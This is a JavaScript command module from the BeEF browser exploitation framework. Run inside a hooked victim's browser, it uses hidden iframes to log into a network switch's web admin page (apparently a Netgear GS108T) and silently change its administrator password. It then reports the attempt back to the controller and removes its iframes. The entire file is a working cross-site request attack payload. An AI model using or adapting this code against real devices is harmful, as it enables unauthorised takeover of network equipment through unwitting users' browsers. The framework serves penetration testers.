//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  var base = '<%= @base %>';
  var oldpassword = '<%= @oldpassword %>';
  var newpassword = '<%= @newpassword %>';
 
  var gs_iframe = beef.dom.createInvisibleIframe();
  gs_login = function()  {
     var d = new Date;
     var rtime = (d.getTime() / 500);
     gs_iframe.setAttribute('src', base+'login.cgi?passwd='+oldpassword+'&rtime='+rtime);
  }

  var gs108t_iframe = beef.dom.createInvisibleIframe();
  gs_change_pwd = function() {
     gs108t_iframe.setAttribute('src', base+'password.cgi?inputBox_oldPassword='+oldpassword+'&inputBox_newPassword='+newpassword+'&inputBox_retypeNewPassword='+newpassword);
  }

  //login to create the cookie
  gs_login();

  //wait some miliseconds and attempt to change the password
  setTimeout("gs_change_pwd()", 500);

  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

  cleanup = function() {
    document.body.removeChild(gs108t_iframe);
    document.body.removeChild(gs_iframe);
  }
  setTimeout("cleanup()", 15000);
});